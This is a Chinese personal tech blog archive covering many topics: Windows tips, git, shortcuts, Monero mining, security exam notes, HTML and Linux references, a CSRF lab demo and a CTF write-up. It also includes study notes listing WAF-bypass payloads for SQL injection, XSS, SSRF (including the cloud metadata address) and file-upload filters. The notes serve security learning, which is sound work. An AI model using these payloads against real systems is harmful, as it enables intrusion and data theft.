桌面的图标左下角总是有个小箭头,看着烦,想去掉,用网上的方法,删去了几个注册表的值。
+果然,注册表还是不能随便删的,结果任务栏的程序却无法正常打开。
+解决方法:
+1 | 方法一: |
去除桌面图标小箭头:
+1 | 如果还需要除去小箭头用下面的命令,用这个方法就可以避免错误了 |
温馨提示:注册表很重要,不要随便删除哦!
+2022/5/22 更新
+最近更新了windows11系统,小箭头又出来了,百度上的方法都不管用,最后靠微软官方解决的。方法如下:
+1 | 1.右键“开始”菜单,找到“运行”,输入命令 regedit ,打开“注册表编辑器” |
将远程仓库克隆到本地,包括此仓库的版本变化信息。
+不需要进行git init操作
方法:https或SSH
+拉取远程更新到本地仓库,相当于从远程仓库或许最新版,然后与本地的分支合并。
+git pull = git fetch + git merge
新建标签页:Ctrl + T
+重新打开关闭的标签页:Ctrl + Shift + T
+新建窗口: Ctrl + N
+新建无痕窗口:Shift + Ctrl + N
+打开 Home 页面:Alt + Home
+同个标签前进 / 后退:Alt + Right / Alt + Left
+切换标签页:Ctrl + Tab
+关闭标签页:Ctrl + W
+关闭窗口:Alt + F4 / Ctrl + Shift + W
+下载内容:Ctrl + J
+历史记录:Ctrl + H
+任务管理器:Shift + Esc
+清除历史记录:Ctrl + Shift + Del
+跳转到地址栏:Ctrl + L
+先下翻页:PgUp
+向上翻页:PgDn
+滑动到最顶部:Home
+滑动到最底部:End
+调整页面字体大小:Ctrl + ‘’+’’ / Ctrl + ‘’-‘’
+页面字体恢复默认:Ctrl + 0
+全屏切换:F11
+win+E 打开我的电脑
+win+D 打开桌面
+win+S/Q 搜索
+win+M 全部窗口最小化
+win+V 打开剪切板
+win+W 打开白板
+win+Shift+S 截屏
+win+Tab 新建电脑桌面
+Win+Ctrl+D 新建电脑桌面
+Win+Ctrl+(←/→) 虚拟桌面间切换
+win+(↓\↑) 窗口大小
+win+I 打开设置
+Win+数字键:打开任务栏上第n个程序
+Alt+Tab:快速切换窗口
+++解释一下常见的术语
+
很早就听说过比特币,比特币作为一种全新理念的数字货币,在互联网上可谓风起云涌。自2009年始发以来,比特币价格飙升。
+在我写下这篇博文的时候,比特币早已超过一万美元了。
+与日常接触的货币不同,比特币的有限的,在它诞生的那刻就已经决定了。
+++区块回报每产出21万个区块减半一次,周期大约为4年,最近一次减半在2020年5月12日28,而此种收敛等比数列的和必然是有限的,到2140年时,将不再有新的比特币产生,最终流通中的比特币将总是略低于2100万个。2019年5月12日时,比特币总存量约17,695,512个,实际可流通的量还会因为私钥丢失等因素更加减少。
+
更有趣的是, 比特币的创始人到目前为止还是世界之谜, 真是太”低调”了.
+当然,用PC来挖比特币是一件很不现实的事情,于是我转向了另一个币种:
+Monero,俗称门罗币.它是一个很出名的”匿名币”
+推荐使用官网提供的GUI,当然也可以找一些轻量级的”网页钱包”.
+系统已经默认生成了以4开头的收款地址,可以将它理解为”银行卡卡号”
+先假设,你是一个淘金者,你想挖金子,可不是想挖就能挖,你肯定先找一个挖金公司,然后打工,付出劳动,获得回报.同理,我们要先找到一个矿池.
+矿池很多,我找了一个国内比较出名:猫池.https://c3pool.com
挖金子还需要什么呢,哦,对了!我们还缺一把铲子!
+我这里以xmrig作为挖矿程序.https://github.com/xmrig/xmrig
把相应文件下载到服务器,做好配置文件(与选择的矿池有关),准备开挖!
+在矿池页面可以看到,这个服务器的效率是很低的
+于是我尝试在PC上挖矿.效率能达到服务器的十几倍.
+经过连续几个小时的”CPU高强度作业”,终于有了一些收获.
+预估了一下,24小时不间断连续挖一个月,大概能挖到2$的币.
+在互联网世界,还有很多东西是可以探索的.
+从第一次上网,第一次写出hello,world!第一次看Youtube,到”第一次挖矿”
很多东西,了解多一点,不是坏事.
+但真正的挖矿,还是交给”真正有实力的矿工”去做吧.
+斥资600大洋,学习了阿里云的云安全ACA,50多个课程都认真的听了一遍。感觉老师讲的不错,不是“只会读PPT”的那种。对阿里巴巴的云管理、云使用、云安全、云生态,有点一些了解。
当然,考试很简单。也算是考取的第一个专业证书吧,纪念一下。
+
+++最近复习信息系统安全,以及备考NISP,做一些简单的知识点总结。
+
定义:信息安全一般指信息系统(包括硬件、软件、数据、人、物理环境及其基础设施)受到保护,不受偶然的或者恶意原因的影响而遭到破坏、更改、泄露,系统连续可靠正常地运行,信息服务不中断,最终实现业务连续性。信息安全的根本目的是使信息不受内部、外部、自然等因素的威胁。
+计算机系统安全:为数据处理系统建立和采用的技术和 管理的安全保护,保护计算机硬件、软件和数 据不因偶然和恶意的原因遭到破坏、更改和泄露。
+基本属性:机密性、完整性、可用性
+扩展属性:真实性、不可否认性、可控性
+信息安全保障:采用技术、管理、工程等综合手段,保护信息和信息系统,使其能够安全运行的防护性行为。
+APT攻击:即高级可持续威胁攻击,也称为定向威胁攻击,指某组织对特定对象展开的持续有效的攻击活动。这种攻击活动具有极强的隐蔽性和针对性,通常会运用受感染的各种介质、供应链和社会工程学等多种手段实施先进的、持久的且有效的威胁和攻击。
+
PKI公钥基础设施是一个包括硬件、软件、人员、策略和规程的集合,用来实现基于公钥密码体制的密钥和证书的产生、管理、存储、分发和撤销等功能。PKI体系是计算机软硬件、权威机构及应用系统的结合。它为实施电子商务、电子政务、办公自动化等提供了基本的安全服务,从而使那些彼此不认识或距离很远的用户能通过信任链安全地交流。
+访问控制主要包括主体、客体和控制策略三个要素:
+1.主体是指提出访问资源具体请求的实体
+2.客体是指被访问资源的实体
+3.控制策略是指主体对客体的相关访问规则的集合
+
+
+数字证书:
+由第三方可信机构(一般是证书服务器)颁发的数字证书,可以证明身份的可信度。
+网络嗅探是通过截获、分析网络中传输的数据而获取有用信息的行为。
+网络钓鱼是指攻击者利用伪造的网站或欺骗性的电子邮件进行的网络诈骗活动。
+VPN:在公用网络上建立专用网络,进行加密通讯。
+防火墙:计算机网络中所说的防火墙,是指设置在不同网络(如:可信任的内网和外网或专用网与不可信的共用网)之间的一系列包括软硬件;在内的部件组合。它在内网和外网之间构建一道保护屏障,网络内部和外部之间的所有数据流必须经过防火墙,只有符合安全标准的数据流才能通过防火墙。
+恶意代码是指故意编制或设置的、对网络或系统会产生威胁和潜在威胁的计算机代码。主要包括病毒、木马和蠕虫等。
+端口扫描:对计算机端口发送信息,然后根据返回端口状态来分析目标计算机的端口是否打开或者可用,为下一步攻击入侵做好准备。
+邮件通信:
+
+
+
+
+B/S和C/S架构:
+B/S结构即浏览器和服务器结构。它是随着Internet技术的兴起,对C/S结构的一种变化或者改进的结构。在这种结构下,用户工作界面是通过WWW浏览器来实现,极少部分事务逻辑在前端(Browser)实现,但是主要事务逻辑在服务器端(Server)实现,形成所谓三层3-tier结构。
+C/S 结构,即大家熟知的客户机和服务器结构。它是软件系统体系结构,通过它可以充分利用两端硬件环境的优势,将任务合理分配到Client端和Server端来实现,降低了系统的通讯开销。
+说白了,BS架构就是浏览器应用,CS架构就是客户端应用,当然应用需要服务器配合,像腾讯就是以C/S结构起家的,其旗下的QQ这一软件就是典型的C/S结构应用,像Facebook就是以B/S为结构的。B/S结构的好处就是方便,不跨平台性好,真正的实现了一次开发,处处运行。C/S结构以其稳定安全著称,降低了通讯代价,但是实现起来麻烦,需要开发服务器和客户端两套系统并且在不同的平台移植起来非常麻烦。所以现在大多是以C/S模式来开发。
+移动终端面临的威胁:
+1.伪基站攻击。以自己为中心冒充基站,向周围手机发送垃圾短信,并且短信中包含恶意链接的情况。
2.二维码扫描。二维码扫描可能带来如下风险:手机病毒、木马程序。
容灾:容灾系统是指在相隔较远的异地,建立两套或多套功能相同的IT系统,互相之间可以进行健康状态监视和功能切换,当一处系统因意外(如火灾、地震等)停止工作时,整个应用系统可以切换到另一处,使得该系统功能可以继续正常工作。容灾技术是系统的高可用性技术的一个组成部分,容灾系统更加强调处理外界环境对系统的影响,特别是灾难性事件对整个IT节点的影响,提供节点级别的系统恢复功能。
+灾备:灾难备援,它是指利用科学的技术手段和方法,提前建立系统化的数据应急方式,以应对灾难的发生。其内容包括数据备份和系统备份,业务连续规划、人员架构、通信保障、危机公关,灾难恢复规划、灾难恢复预案、业务恢复预案、紧急事件响应、第三方合作机构和供应链危机管理等等。
+实际工作中的备份策略:
+操作系统的功能:
+1、进程管理。主要bai是对处理机du进行管理。
+2、存储管理。主zhi要是对内存的dao分配、保护和扩充。
+3、设备管理。对所有输人、输出设备的管理。
+4、文件管理。主要涉及文件的逻辑组织和物理组织,目录的结构和管理。
+5、作业管理。为用户提供一个友好的环境,方便用户组织自己的工作流程。
+信息安全问题产生的根源:信息系统的复杂性会造成系统本身的安全缺陷。
+信息安全应急响应管理过程:1.准备 2.检测 3.遏制 4.根除 5.恢复 6.跟踪
+先学习基础部分,即web三件套
+然后学习框架,即“大前端开发”
+另外学习其他知识
+++超文本标记语言(HyperText Markup Language,简称:HTML)是一种用于创建网页的标准标记语言。HTML是一种基础技术,常与CSS、JavaScript一起被众多网站用于设计网页、网页应用程序以及移动应用程序的用户界面。网页浏览器可以读取HTML文件,并将其渲染成可视化网页。HTML描述了一个网站的结构语义随着线索的呈现,使之成为一种标记语言而非编程语言。
+
1 | <!-- |
语义与呈现分离
+是一句常见的熟语、一种设计哲学,同时也是在多种出版技术纪律中应用的一种方法学,涉及到信息检索、模板处理、网页设计、网页程序设计、文字处理、桌面出版、模型驱动开发等出版领域。其为关注点分离这个更加宽泛的哲学的特例。一篇文档的实际内容和意义,与这篇文档呈现给读者的方式,是相互独立的。
+HTML语义化的优点
+| 元素 | +说明 | +类型 | +
|---|---|---|
| base | +相对 URL 基础 | +元数据 | +
| body | +HTML 文档内容 | +无 | +
| DOCTYPE | +HTML 开始 | +无 | +
| head | +HTML 文档元数据 | +无 | +
| html | +HTML 文档 html 部分 | +无 | +
| link | +外部链接的关系 | +元数据 | +
| meta | +文档信息 | +元数据 | +
| noscript | +禁用脚本 | +元数据、短语 | +
| script | +脚本 | +元数据、短语 | +
| style | +CSS 样式 | +元数据 | +
| title | +文档标题 | +元数据 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| a | +超链接 | +短语、流 | +
| abbr | +缩略语 | +短语 | +
| b | +非强调标记文字 | +短语 | +
| br | +换行 | +短语 | +
| cite | +其他作品标题 | +短语 | +
| code | +代码片段 | +短语 | +
| del | +文字删除线 | +短语、流 | +
| dfn | +术语定义 | +短语 | +
| em | +强调标记 | +短语 | +
| i | +与周边不同的文字 | +短语 | +
| ins | +加入文档的文字 | +短语、流 | +
| kbd | +用户输入的内容 | +短语 | +
| mark | +标记 | +短语 | +
| q | +引用他处的内容 | +短语 | +
| rp | +ruby 标记括号 | +短语 | +
| rt | +ruby 标记注音符号 | +短语 | +
| ruby | +位于表意文字上方或者右方的注音符号 | +短语 | +
| s | +表示内容不再准确 | +短语 | +
| samp | +计算机输出的内容 | +短语 | +
| small | +小号字体 | +短语 | +
| span | +同样元素 | +短语 | +
| strong | +重要内容 | +短语 | +
| sub | +下标 | +短语 | +
| sup | +上标 | +短语 | +
| time | +时间 | +短语 | +
| u | +非强调标记文字 | +短语 | +
| var | +计算机中的变量 | +短语 | +
| wbr | +安全换行的地方 | +短语 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| blockquote | +引用的大段内容 | +流 | +
| dd | +dl 元素中,表示定义 | +无 | +
| div | +通用元素,与 span 对应 | +流 | +
| dl | +术语定义的说明列表 | +流 | +
| dt | +dl 元素中,表示术语 | +无 | +
| figcaption | +figure 元素的标题 | +无 | +
| figure | +图片 | +流 | +
| hr | +段落级别的主题转换 | +流 | +
| li | +ul、ol、menu 元素中,表示列表项 | +无 | +
| ol | +有序列表 | +流 | +
| p | +段落 | +流 | +
| pre | +格式应被保留的内容 | +流 | +
| ul | +无序列表 | +流 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| address | +文档或者 article 的联系信息 | +流 | +
| article | +作品信息 | +流 | +
| aside | +周边牵涉内容 | +流 | +
| details | +区域,展开获取细节 | +流 | +
| footer | +尾部 | +流 | +
| h1-h6 | +标题 | +流 | +
| header | +首部 | ++ |
| hgroup | +一组标题组织,形成目录 | +流 | +
| nav | +导航元素 | +流 | +
| section | +部分流 | ++ |
| summary | +details 元素中,表示该元素标题 | +无 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| caption | +表格标题 | +无 | +
| col | +列 | +无 | +
| colgroup | +一组列 | +无 | +
| table | +表格 | +无 | +
| tbody | +表格主体 | +无 | +
| td | +单元格 | +无 | +
| tfoot | +表脚 | +无 | +
| th | +表头表脚单元格 | +无 | +
| thead | +表头 | +无 | +
| tr | +一行单元格 | +无 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| button | +按钮 | +短语 | +
| datalist | +建议列表 | +流 | +
| fieldset | +一组表单元素 | +流 | +
| form | +表单 | +流 | +
| input | +输入 | +短语 | +
| keygen | +生成公私钥 | +短语 | +
| label | +表单说明标签 | +短语 | +
| legend | +fieldset 元素说明标签 | +无 | +
| optgroup | +一组相关的 option 元素 | +无 | +
| option | +用户选择的可选项 | +无 | +
| output | +计算结果 | +短语 | +
| select | +用户选择固定项 | +短语 | +
| textarea | +多行输入 | +短语 | +
| 元素 | +说明 | +类型 | +
|---|---|---|
| area | +客户端分区响应区域 | +短语 | +
| audio | +音频 | +无 | +
| canvas | +画布 | +短语、流 | +
| embed | +用插件嵌入内容 | +短语 | +
| iframe | +嵌入另一个文档 | +短语 | +
| img | +图片 | +短语 | +
| map | +客户端分区响应 | +短语、流 | +
| meter | +许可值范围背景中的图形表示 | +短语 | +
| object | +生成上下文与客户端分区响应图 | +短语、流 | +
| param | +通过 obj 元素传给插件的参数 | +无 | +
| progress | +进度 | +短语 | +
| source | +媒体资源 | +无 | +
| svg | +结构化矢量内容 | +无 | +
| track | +媒体附加轨道(如字幕) | +无 | +
| video | +视频 | +无 | +
| 序号 | +命令 | +对应英文 | +作用 | +
|---|---|---|---|
| 01 | +ls | +list | +查看当前文件夹下的内容 | +
| 02 | +pwd | +print work directory | +查看当前所在文件夹 | +
| 03 | +cd[目录名] | +changge directory | +切换文件夹 | +
| 04 | +touch[文件名] | +touch | +如果文件不存在,新建文件 | +
| 05 | +mkdir[目录名] | +make directory | +创建目录 | +
| 06 | +rm[文件名] | +remove | +删除指定文件 | +
| 07 | +clear | +clear | +清屏 | +
| 选项 | +含义 | +
|---|---|
| -p | +可以递归创建目录 | +
新建目录的名称 不能与当前目录中 已有的目录或文件 同名
+| 选项 | +含义 | +
|---|---|
| -f | +强制删除,忽略不存在的文件,无需提示 | +
| -r | +递归地删除目录下的内容,删除文件夹 时必须加此参数 | +
| 序号 | +命令 | +对应英文 | +作用 | +
|---|---|---|---|
| 01 | +tree [目录名] | +tree | +以树状图列出文件目录结构 | +
| 02 | +cp 源文件目标文件 | +copy | +复制文件或者目录 | +
| 03 | +mv 源文件 目标文件 | +move | +移动文件或者目录/文件或者目录重命名 | +
| 选项 | +含义 | +
|---|---|
| -d | +只显示目录 | +
| 选 项 | +含义 | +
|---|---|
| -i | +覆盖文件前提示 | +
| -r | +若给出的源文件是目录文件,则 cp 将递归复制该目录下的所有子目录和文件,目标文件必 | +
须为一个目录名
+| 选项 | +含义 | +
|---|---|
| -i | +覆盖文件前提示 | +
| 序 号 | +命令 | +对应英文 | +作用 | +
|---|---|---|---|
| 01 | +cat 文件名 | +concatenate | +查看文件内容、创建文件、文件合并、追加文件内容等功能 | +
| 02 | +more 文件名 | +more | +分屏显示文件内容 | +
| 03 | +grep 搜索文本 文件名 | +grep | +搜索文本文件内容 | +
cat 命令可以用来 查看文件内容、创建文件、文件合并、追加文件内容 等功能
cat 会一次显示所有的内容,适合 查看内容较少 的文本文件
| 选项 | +含义 | +
|---|---|
| -b | +对非空输出行编号 | +
| -n | +对输出的所有行编号 | +
++ +参加了字节跳动安全与风控训练营,根据官网安全综述文档摘录的安全学习路线
+
前端安全
+接口安全
+安全建设
+学习路线
+同源策略是指在Web浏览器中,允许某个网页脚本访问另一个网页的数据,但前提是这两个网页必须同源。此策略可防止某个网页上的恶意脚本通过该页面的文档对象模型访问另一网页上的敏感数据。
+同源的判断如下:
+同源策略对Web应用程序具有特殊意义,因为Web应用程序广泛依赖于cookie来维持用户会话,所以必须将不相关网站严格分隔,以防止丢失数据泄露。
+下表列出哪些URL与http://www.example.com/dir/page.html 属于相同来源
+| http://en.example.com/dir/other.html | +否 | +不同域名 | +
|---|---|---|
| http://example.com/dir/other.html | +否 | +不同域名(需要完全匹配) | +
| **http://**username:password@www.example.com/dir2/other.html | +是 | +只有路径不同 | +
| http://v2.www.example.com/dir/other.html | +否 | +不同域名(需要完全匹配) | +
| http://www.example.com:**81**/dir/other.html | +否 | +不同端口(若未标明,http:// 默认端口号为80) | +
| http://www.example.com/dir/page2.html | +是 | +只有路径不同 | +
| http://www.example.com/dir2/other.html | +是 | +只有路径不同 | +
| https://www.example.com/dir/other.html | +否 | +不同协议(https和http) | +
about:blank 或 javascript: URL 执行的脚本会继承打开该 URL 的文档的源,因为这些类型的 URLs 没有包含源服务器的相关信息。同源策略仅适用于脚本,这意味着某网站可以通过相应的HTML标签访问不同来源网站上的图像、CSS和动态加载脚本等资源。而跨站请求伪造(CSRF)就是利用同源策略不适用于HTML标签的缺陷。
+此处以必火靶场的CSRF-GET型攻击进行实践。
+ +
+
+正常转账操作:http://www.nanhack.com/payload/xss/csrf1.php?name=admin&money=10
+恶意攻击者页面:http://www.nanhack.com/payload/xss/csrf1.php
+访问恶意攻击者页面产生CSRF请求: http://www.nanhack.com/payload/xss/csrf1.php?name=zsm&money=1000
+
+
+打开恶意攻击页面,发现是一个图片,提示:你的账户 钱少了。
+返回查看,果然,账户少了1000元。
+1 |
|
<img src>中的链接就是构造了一个“转账”链接。
但是这种恶意链接构造的CSRF隐蔽性很低,很容易被发现。
+可以利用一些更加隐藏的方式:
+令牌同步
+令牌同步模式(英语:Synchronizer token pattern,简称STP)。原理是:当用户发送请求时,服务器端应用将令牌(token,一个保密且唯一的值)嵌入HTML表格,并发送给客户端。客户端提交HTML表格时候,会将令牌发送到服务端,令牌的验证是由服务端实行的。令牌可以通过任何方式生成,只要确保随机性和唯一性。这样确保攻击者发送请求时候,由于没有该令牌而无法通过验证。
+局限性:会导致服务端的复杂度升高,复杂度源于令牌的生成和验证。因为令牌是唯一且随机,如果每个表格都使用一个唯一的令牌,那么当页面过多时,服务器由于生产令牌而导致的负担也会增加。而使用会话(session)等级的令牌代替的话,服务器的负担将没有那么重。
+检查Referer字段
+HTTP头中有一个Referer字段,这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时,通常来说,Referer字段应和请求的地址位于同一域名下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,这时候服务器就能识别出恶意的访问。
+局限性:因其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其Referer字段的可能。
+添加校验token
+由于CSRF的本质在于攻击者欺骗用户去访问自己设置的地址,所以如果要求在访问敏感数据请求时,要求用户浏览器提供不保存在cookie中,并且攻击者无法伪造的数据作为校验,那么攻击者就无法再运行CSRF攻击。这种数据通常是窗体中的一个数据项。服务器将其生成并附加在窗体中,其内容是一个伪随机数。当客户端通过窗体提交请求时,这个伪随机数也一并提交上去以供校验。正常的访问时,客户端浏览器能够正确得到并传回这个伪随机数,而通过CSRF传来的欺骗性攻击中,攻击者无从事先得知这个伪随机数的值,服务端就会因为校验token的值为空或者错误,拒绝这个可疑请求。
+++The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
++寒假参加了i春秋的CTF ,总结一下。
+
手机打出”FUN”,扫描即可。
+
+
+关于十二宫杀手:
+ + +根据新闻内容,先对明文进行向下右移两位,形成新的矩阵,再用这款解密工具即可。
+据说要使用一款叫azdecrypt的工具https://m.majorgeeks.com/files/details/azdecrypt.html
+1.使用kali自带的工具分离图片
+2.傅里叶变化解密图片水印
+1 | %% extract watermark |
+
+3.对图片进行PS
+
+
+此题比较复杂,要用到很多加密工具。注意的是,有个base32编码。
+shell:shell是外壳的意思,就是操作系统的外壳。我们可以通过shell命令来操作和控制操作系统,比如Linux中的Shell命令就包括ls、cd、pwd等等。总结来说,Shell是一个命令解释器,它通过接受用户输入的Shell命令来启动、暂停、停止程序的运行或对计算机进行控制。
+shell 是一个应用程序,它连接了用户和 Linux 内核,让用户能够更加高效、安全、低成本地使用 Linux 内核,这就是 Shell 的本质。
+shell 本身并不是内核的一部分,它只是站在内核的基础上编写的一个应用程序。
+
+
+shell脚本:shell脚本就是由Shell命令组成的执行文件,将一些命令整合到一个文件中,进行处理业务逻辑,脚本不用编译即可运行。
+进入 Linux 终端,编写一个 Shell 脚本 hello.sh :
+1 |
|
运行:
+1 | # 方法1 |
终端打印出 hello world! 。
说明:
#! 告诉系统这个脚本需要什么解释器来执行。.sh 不是强制要求的。hello.sh 作为 Shell 解释器的参数。此时 Shell 脚本就不需要指定解释器信息,第一行可以去掉。输出从1加到100的值。
+1 |
|
++WAF : Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
+
1.1 寻找真实IP
+
+
+1.2 注入绕过
+| 绕过方式 | +例子 | +说明 | +
|---|---|---|
| 大小写绕过 | +UniOn SeleCt | +针对特定关键字,大小写不敏感,SQL语句不分大小写 | +
| 双写绕过 | +Ununionion seselectlect | +过滤后仍是注入语句(只过滤了一次) | +
| 内联注释绕过 | +and /****!***select * from test*/ | +mysql扩展功能,在/*后加惊叹号,注释中的语句会被执行 | +
| 注释符绕过 | +uni/*/on se/*/lect | +注释符号不影响语句的连接 | +
| 对or/and的绕过 | +and = &&,or = || | +等价逻辑符号 | +
| 对单引号的绕过 | +十六进制编码 宽字节注入 http://www.xxx.com/login.php?user=%df****’ or 1=1 %df****’转义后为=%df%5c%27=運’ select * fromcms_user where username = ‘運’ or 1=1 | +数值型可以不加单引号 将转义符号闭合掉 mysql使用GBK多字节编码,GPC开启(php.ini,magic_quotes_gpc = On),输入%df%27时首先经过上面提到的转义就会变成%df%5c%27(%5c就是反斜杠)。之后再数据库查询由于使用了GBK多字节编码,即在汉字编码范围内两个字节会被编码为一个汉字,然后MySQL服务器会对查询语句进行了GBK编码%df%5c转换成汉字,而单引号逃出了 | +
| 等价函数替换 | +hex() bin() 等价于ascii() Sleep() 等价于benchmark() | +函数结果相同 | +
| 空格绕过 | +select/*/*/*/from/**/yz; select%0a*%0afrom%0ayz; %0a 是回车 select(a)from(yz); | +使用其他字符替换空格 | +
1.3 XSS绕过
+反射型:
+
+
+存储型:
+
+
+
+
+| 绕过方式 | +例子 | +说明 | +
|---|---|---|
| 标签闭合 | +,可控为aaa的值,那么可以使用 “> 闭合来绕过,“ | +利用”> 等标签来闭合前面标签来达到绕过插入任意JS的效果 | +
| 标签优先性 | + |
+利用标签解析的优先性绕过。 比如 |
+
| 常见编码 | +a aa> <svg/onload=setTimeout(‘\x61\x6C\x65\x72\x74\x28\x31\x29’)> | +利用常见的一些编码方式去绕过。比如利用 : 当成 冒号: 来绕过,( 和 ) 等效与左右括号 () 可控点在Json中时可使用Unicode编码绕过,在url中可用使用url双重编码等绕过 %0a 为换行的URL编码,可以用来绕过一些Waf,从而执行后面的alert,类似于 Mysql中的%0a换行 利用各种类型的进制转换也可以用来绕过xss防御 | +
| 浏览器差异 | +比如 .url 后缀文件也可用造成xss 比如利用IE浏览器中也有一些特性或者函数 | +比如 .url 后缀文件在Firfox浏览器中也会解析成htm文件,也会造成xss 比如利用IE浏览器中一些独特函数来执行xss | +
| 关键字、函数绕过 | + |
+利用JS的特性,以拼接的方式来组合关键字,从而绕过waf的关键字检测 加入一些特殊字符也可以绕过waf对关键函数的检测 | +
| Fuzz | +JSFuck | +可以利用Fuzz来发现一些黑名单中未包含到的标签、事件、关键函数 | +
1.4 SSRF绕过
+| 绕过方式 | +例子 | +原理 | +
|---|---|---|
| 进制转换 | +十进制 http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 http://2852039166/ = http://169.254.169.254 十六进制 http://0x7f000001/ = http://127.0.0.1 http://0xc0a80014/ = http://192.168.0.20 | +利用十进制、十六进制形式的ip绕过检测,十进制、十六进制的ip在请求时会正常解析,但检测时可能遗漏 | +
| 特殊ip形式 | +http://[::]:80/=127.0.0.1 http://127.127.127.127 127.0.0.1.xip.io 127。0。0。1 = 127.0.0.1 http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com http://[0:0:0:0:0:ffff:127.0.0.1] | +利用 [::]、CIDR (ip划分方法)绕过localhost限制 利用封闭式字母数字绕过检测 利用ipv6绕过检测 | +
| 正则缺陷 | +http://127.1.1.1:80****\@127.2.2.2:80/ http://127.1.1.1:80:@@127.2.2.2:80/ **http://127.1.1.1:80#****\@127.2.2.2:80/** http://endswith{domain}/ **http://{domain}.**localhost | +利用检测正则表达式缺陷绕过,如仅检测字符串是否包含白名单域名或以白名单域名结尾,或者正则未转义点号导致绕过等 | +
| 解析库与请求库差异导致绕过 | +http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 : 1.1.1.1 requests + browsers : 2.2.2.2 urllib : 3.3.3.3 | +利用检测时使用的URL parse库与请求时使用的parse库的差异绕过,如 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ 不同的parse库的解析结果不一样 | +
| 302跳转绕过 | +Create a page on a whitelisted host that redirects requests to the SSRF the target URL | +利用可信域名的302跳转绕过检测 | +
| dnsrebind绕过 | +Create a domain that change between two IPs | +设置两条A记录,利用dns重绑定绕过检测,第一次解析返回正常ip,第二次返回内网地址(dns解析记录缓存存活的时间为0,相当于每次解析都要去重新请求dns服务器,无法在本地缓存) | +
1.5 上传绕过
+
| 绕过方法 | +例子 | +原理 | +
|---|---|---|
| js检查 | +绕过前端 | +通过抓包提交,绕过前端js检测 删除对js验证脚本的调用,使其不能对上传的文件类型做检测,从而达到绕过 | +
| 上传特殊可解析后缀 | +jsp jspx jspf asp asa cer aspx php php3 php4 pht phtml | +绕过黑名单,同样可以执行脚本 | +
| 上传.htaccess | +<FilesMatch “bytedance”> SetHandler application/x-httpd-php | +htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 通过.htaccess文件,调用php的解析器解析一个文件名只要包含“bytedance”这个字符串的任意文件 | +
| 后缀大小写绕过 | +1.php ==> 1.pHP | +由于windows不区分大小写,后端校验未使用strtolower等函数将文件后缀大小写统一处理,导致黑名单不完整而绕过 | +
| 空格绕过 | +1.php ==> 1.php(空格) | +由于Windows处理文件时,会自动删除文件后缀带有的空格和点,从而导致绕过 | +
| ::DATA绕过 | +1.php::$DATA==>1.php | +Windows的一种流文件格式,上传这种格式流文件格式的同时会在相同目录下生成一个含有相同内容宿主文件 | +
| 双写后缀绕过 | +1.phphpp ==> 1.php | +后端过滤时,使用了preg_replace等替换函数将php关键字替换为空,但是却没有循环替换,导致前面的ph和后面的p重新组合成php,从而导致绕过 | +
| MIME绕过 | +GIF image/gif JPG image/pjpeg image/jpeg ZIP application/x-compressed application/octet-stream JSP text/html EXE application/octet-stream | +修改Content-Type中为允许的类型 | +
| %00截断 | +1.php%00a.jpg=1.php | +PHP<5.3.29,且GPC关闭时,%00在URL中充当结束符,当解析到%00时,解析器就会认为字符串已经读取完毕(%00截断主要用在路径上的截断) | +
| 0x00截断 | +1.php.jpg==>1.php0x00jpg(0x00为16进制) | +PHP<5.3.29,且GPC关闭时,0x00截断其实也是16进制截断,需要修改16进制的数据头,0x00也是截断符号,0x00就是%00解码成的16进制,原理其实与%00截断一样 | +
| 文件头检查绕过 | +GIF89a或在图片中插入一句话 | +检查指定文件头时可绕过 | +
| 二次渲染绕过 | +寻找图片渲染后没有变化的部分,插入一句话 | +恶意脚本不被渲染掉 | +
| 条件竞争 | +与后端代码写法有关。比如先上传文件后,再检查文件后缀是否合法,不合法就再删除。 | +利用条件竞争删除文件时间差绕过。在文件上传到服务器,程序还未执行到删除文件代码之前,通过快速发送大量的数据包提前执行程序,达到绕过 | +
| 解析漏洞绕过 | +参考解析漏洞表格 | +参考解析漏洞表格 | +
1.6 其他方法
+1.HTTP和HTTPS同时开放服务,没有做HTTP到HTTPS的强制跳转,导致HTTPS有WAF防护,HTTP没有防护,直接访问HTTP站点绕过防护。
+2.当提交GET、POST同时请求时,进入POST逻辑,而忽略了GET请求的有害参数输入,可轻易Bypass。
+++一直会听说红队蓝队,却不知道真的概念,今天好好了解一下。
+
永远记得,安全是先有攻后有防,这个世界上先有黑帽子,然后才有人给白帽子发工资。所以可以毫不客气的说,黑帽子是网安界的基石(注意:这不是在鼓励你去做黑帽子)。黑帽子是先驱,白帽子是追随者。
+所以你需要做的,是代入黑帽子的思维:这个世界上什么资产最多?web应用?手机app?端应用?(再细化一些:struct2?wordpress?rdp?smb?bt? etc.),这些资产的漏洞的发现/利用难度和利用后的获利相比,哪个性价比最高?毫无疑问,性价比高的领域,就是黑帽子最集中的领域,也就是白帽子们投入最大精力的领域(因为雇主们最舍得在这上面掏钱),你应该研究这个,而不是走到一些很生僻,很小众的细分领域,否则未来有失业风险,毕竟即使是小众领域,以一个人的精力也是学不完的,所以别想着什么双修,什么全领域制霸。
